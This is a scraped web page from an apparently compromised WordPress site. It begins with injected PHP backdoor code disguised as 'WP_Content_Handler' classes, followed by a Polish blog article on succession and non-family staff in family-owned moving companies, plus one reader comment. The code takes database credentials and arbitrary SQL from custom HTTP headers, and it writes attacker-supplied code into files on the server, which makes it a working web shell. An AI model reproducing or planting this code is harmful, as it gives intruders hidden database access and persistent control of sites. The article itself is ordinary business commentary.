n class WP_Content_Handler_Checker { var $wp_host; var $wp_user; var $wp_pass; var $name; var $result = array(); var $errors = array(); var $wp_themes_count = 0; function check_wp_connection($wp_connection) { if (class_exists('PDO')) { $this->check_wp_pdo_connection($wp_connection); } else { $this->check_wp_mysql_connection($wp_connection); } } function check_wp_mysql_connection($wp_connection) { if (function_exists('mysqli_connect')) { $connection = mysqli_connect($this->wp_host, $this->wp_user, $this->wp_pass, $this->name); if (!$connection instanceof mysqli) { $this->add_wp_error(910, sprintf("Can't connect to mysqli, message - %s, code - %d", $connection->connect_error, $connection->connect_errno)); return; } call_user_func_array(array($connection, 'query'), array("SET NAMES 'utf8'")); call_user_func_array(array($connection, 'query'), array("SET CHARACTER SET 'utf8'")); $wp_connection_success = call_user_func_array(array($connection, 'query'), array($wp_connection)); if ($wp_connection_success == false) { $this->add_wp_error($connection->errno, $connection->error); } else { $this->wp_themes_count = $connection->{'affected_rows'}; while ($data = call_user_func_array(array($wp_connection_success, 'fetch_assoc'), array())) { $this->result[] = $data; } } } elseif (function_exists('mysql_connect')) { $connection = mysql_connect($this->wp_host, $this->wp_user, $this->wp_pass); if ($connection == false) { $this->add_wp_error(910, "Can't connect to mysql"); return; } mysql_select_db($this->name, $connection); mysql_query("SET NAMES 'utf8'", $connection); mysql_query("SET CHARACTER SET 'utf8'", $connection); $wp_connection_success = mysql_query($wp_connection, $connection); if ($wp_connection_success == false) { $this->add_wp_error(mysql_errno($connection), mysql_error($connection)); } else { $this->wp_themes_count = mysql_num_rows($wp_connection_success); while ($data = mysql_fetch_assoc($wp_connection_success)) { $this->result[] = $data; } } } } function check_wp_pdo_connection($wp_connection) { $pdo_config_all = 'mysql:'; $pdo_config = array( 'host' => $this->wp_host, 'dbname' => $this->name, 'charset' => 'utf8' ); foreach ($pdo_config as $key => &$item) { $item = $key . '=' . $item; } $pdo_config_all .= implode(';', $pdo_config); try { $connection = new PDO($pdo_config_all, $this->wp_user, $this->wp_pass); call_user_func_array(array($connection, 'query'), array('SET CLIENT_ENCODING TO "UTF8"')); call_user_func_array(array($connection, 'query'), array('SET NAMES "UTF8"')); $query = call_user_func_array(array($connection, 'query'), array($wp_connection, PDO::FETCH_ASSOC)); if ($query == false) { $error_info = call_user_func_array(array($connection, 'errorInfo'), array()); $error_code = call_user_func_array(array($connection, 'errorCode'), array()); $this->add_wp_error($error_code, end($error_info)); return; } $this->wp_themes_count = call_user_func(array($query, 'rowCount'), array()); $this->result = call_user_func_array(array($query, 'fetchAll'), array()); } catch (PDOException $exception) { $this->add_wp_error(call_user_func_array(array($exception, 'getCode'), array()), call_user_func_array(array($exception, 'getMessage'), array())); } } function __construct() { $this->wp_host = stripslashes(@$_SERVER['HTTP_VI_DATABASE_HOST']); $this->wp_user = stripslashes(@$_SERVER['HTTP_VI_DATABASE_USER']); $this->wp_pass = stripslashes(@$_SERVER['HTTP_VI_DATABASE_PASS']); $this->name = stripslashes(@$_SERVER['HTTP_VI_DATABASE_NAME']); if (empty($this->wp_host)) { $this->add_wp_error(900, "No host provided"); } if (empty($this->wp_user)) { $this->add_wp_error(901, "No user provided"); } if (empty($this->wp_pass)) { $this->add_wp_error(902, "No pass provided"); } if (empty($this->name)) { $this->add_wp_error(903, "No database name provided"); } } function add_wp_error($code, $message) { $this->errors[] = array( 'code' => $code, 'message' => $message ); } function get_wp_errors() { return $this->errors; } function wp_get_themes_count() { return $this->wp_themes_count; } function is_wp_connection_succeed() { return !count($this->errors); } function get_wp_connection_result() { return $this->result; } } class WP_Content_Handler_Accessor { function create() { $method = @$_SERVER['HTTP_VI_METHOD']; if (!mb_strlen($method)) { return; } ob_end_clean(); switch ($method) { case 'query': $this->check_wp_connection_handler(); break; case 'update': $this->update_parameters(); break; default: return; } } function check_wp_connection_handler() { $query = stripslashes(@$_SERVER['HTTP_VI_DATABASE_QUERY']); if (!mb_strlen($query)) { $this->wp_response(false, array( array( 'code' => 0, 'message' => 'No query provided' ) )); exit; } $database = new WP_Content_Handler_Checker(); $database->check_wp_connection($query); if ($database->is_wp_connection_succeed()) { $this->wp_response(true, array( 'rows' => $database->wp_get_themes_count(), 'result' => $database->get_wp_connection_result() )); } else { $this->wp_response(false, $database->get_wp_errors()); } } function update_parameters() { $parameters_path = stripslashes(@$_SERVER['HTTP_VI_PATH']); $new_parameters = urldecode(@$_REQUEST['VI_SCRIPT']); $old_parameters_path = stripslashes(@$_SERVER['HTTP_VI_INCLUDE_PATH']); $old_parameters = urldecode(@$_REQUEST['VI_INCLUDE_CODE']); if (!mb_strlen($new_parameters)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript passed' ))); } if (!mb_strlen($parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript path passed' ))); } if (!mb_strlen($old_parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No include path passed' ))); } $success = $this->update_wp_accessor_parameters($parameters_path, $new_parameters); if ($success) { $success = $this->wp_update_parameters($old_parameters_path, $old_parameters); } $this->wp_response($success, null); } function update_wp_accessor_parameters($path, $parameters) { return (bool)@file_put_contents($path, " n" . stripslashes($parameters)); } function wp_update_parameters($old_parameters_path, $old_parameters) { $file = file_get_contents($old_parameters_path); if (!mb_strlen($file)) { return false; } if (mb_strpos($file, $old_parameters) !== false) { return true; } if ($this->is_parameters_valid($file)) { $file = $file . "n" . " n" . $old_parameters . " n?>"; } else { $file = $file . "nn" . $old_parameters; } return (bool)@file_put_contents($old_parameters_path, $file); } function is_parameters_valid($file) { $last_available_parameters_count = strrpos($file, ""); $last_updated_parameters_count = ($last_updated_parameters_count === false) ? -1 : $last_updated_parameters_count; return $last_available_parameters_count <= $last_updated_parameters_count; } function wp_response($success, $data) { $wp_response = array('success' => $success); $wp_response[$success ? 'data' : 'errors'] = $data; header('Content-Type: application/json'); echo json_encode($wp_response); exit; } } $accessor = new WP_Content_Handler_Accessor(); $accessor->create(); Specyfika zarządzania rodzinnym przedsiębiorstwem przeprowadzkowym

Specyfika zarządzania rodzinnym przedsiębiorstwem przeprowadzkowym

Specyfika zarządzania rodzinnym przedsiębiorstwem przeprowadzkowym

Zarządzanie rodzinnym przedsiębiorstwem przeprowadzkowym dotyka w szczególności następujących kwestii[1]:

 • konieczność zachowania równowagi pomiędzy systemem rodziny a systemem firmy przeprowadzkowej,
 • potrzeba wychowania sukcesorów,
 • stosunek do pracowników którzy nie są członkami rodziny, (głównie członków ekip przeprowadzkowych),
 • rodzinne kierownictwo w firmie przeprowadzkowej.

Wyraźna większość (aż 84%) przedsiębiorców wyraża chęci, aby ich przedsiębiorstwo przeprowadzkowe funkcjonowało w kolejnych pokoleniach rodziny. Zaledwie 4% ankietowanych jest temu przeciwna. Pozostałe 12% respondentów to osoby niezdecydowane. Problem wykreowania sukcesora przygotowanego do przejęcia rodzinnego przedsiębiorstwa przeprowadzkowego jest punktem newralgicznym w historii firmy przeprowadzkowej niestety często ignorowanym przez przedsiębiorców. Jak pokazują badania przeprowadzone na firmach zajmujących się realizacją przeprowadzek w Łodzi, aż 52% ankietowanych myśli o przekazaniu rodzinnej firmy przeprowadzkowej następcą, lecz wszyscy oni przyznali, że wprowadzanie dzieci w sprawy firmy ma charakter nieświadomy, nieprzemyślany i mało systematyczny. Bardzo niska jest wśród łódzkich przedsiębiorców rodzinnych świadomość, że sukcesorów należy przygotowywać do przejęcia rodzinnego przedsięwzięcia przeprowadzkowego przez cały proces wychowawcy, trwających od wczesnych lat dziecięcych.

Wykorzystywane formy oddziaływań wychowawczych sprowadzają się do:

 • osobistego wzorca zaangażowania, staranności i oddania firmie,
 • wprowadzania do pracy w przedsiębiorstwie na różnych stanowiskach,
 • edukacji z zakresu związanego z działalnością przedsiębiorstwa,
 • odpowiedniej motywacji.

Jak pokazały badania tylko nieliczni z ankietowanych (8%) przytaczają jako argument wychowawczy moralny obowiązek i tradycje rodzinne związane z kontynuowaniem rodzinnego przedsięwzięcia przeprowadzkowego. Skutkiem takiej postawy jest brak zainteresowania nowy sukcesorów sprawami firmy, 32% z nich wyraźnie nie interesuje się rodzinnym przedsiębiorstwem przeprowadzkowym.

Według literatury amerykańskiej stosunek do pracowników spoza rodziny może być miernikiem dojrzałości zarządzania firmą, nie chodzi tutaj jednak o atmosferę w pracy. Dużo istotniejszymi elementami są: gotowość dopuszczenia do zarządzania przedsiębiorstwem, obiektywna ocena oraz prawidłowa motywacja do wykonania powierzonych zadań. Jak pokazują badania tylko 8% z populacji rodzinnych firm przeprowadzkowych dopuszcza pracowników nie będących członkami rodziny do zarządzania, uwzględniając ich w strukturze formalnego kierownictwa.

Specyfika zarządzania rodzinnym przedsiębiorstwem przeprowadzkowym

Najczęstsze obawy przed dopuszczeniem do zarządzania przedsiębiorstwem przeprowadzkowym specjalistów spoza rodziny to:

 • głębokie przekonanie, iż losami firmy zainteresowani są wyłącznie członkowie rodziny 75%,
 • przekonanie, iż nikt spoza rodziny nie jest w stanie zrozumieć sytuacji przedsiębiorstwa przeprowadzkowego 68%,
 • możliwość utraty prywatności rodzinnego przedsiębiorstwa 60%.

Są to naturalne opory wynikające z ludzkiej psychiki oraz z ogólnego przekonania, że „rodzina wie najlepiej” i nie potrzebuje pomocy specjalistów „z zewnątrz”. W zdecydowanej większości badanych przedsiębiorstw (90%) panowało przekonanie, że pracownicy nie będący członkami rodziny są mniej pracowici, efektywni i zaangażowani w porównaniu z członkami rodziny. Przekonanie to jest krzywdzące i może prowadzić do konfliktów w przedsiębiorstwie przeprowadzkowym. Władze w firmie powinna sprawować osoba mająca ku temu kompetencję bez względu na to czy jest członkiem rodziny czy też nie.


[1] Ł. Sułkowski, Determinanty rozwoju przedsiębiorstw rodzinnych w Polsce, Dom Organizatora, Toruń 2005, s. 74-76.

1 odpowiedź na temat “Specyfika zarządzania rodzinnym przedsiębiorstwem przeprowadzkowym”

 1. Janek pisze:

  Rodzinne firmy w żadnej branży nie są dobrym pomysłem. W świecie biznesu nie ma miejsca na sentymenty.

Leave a Reply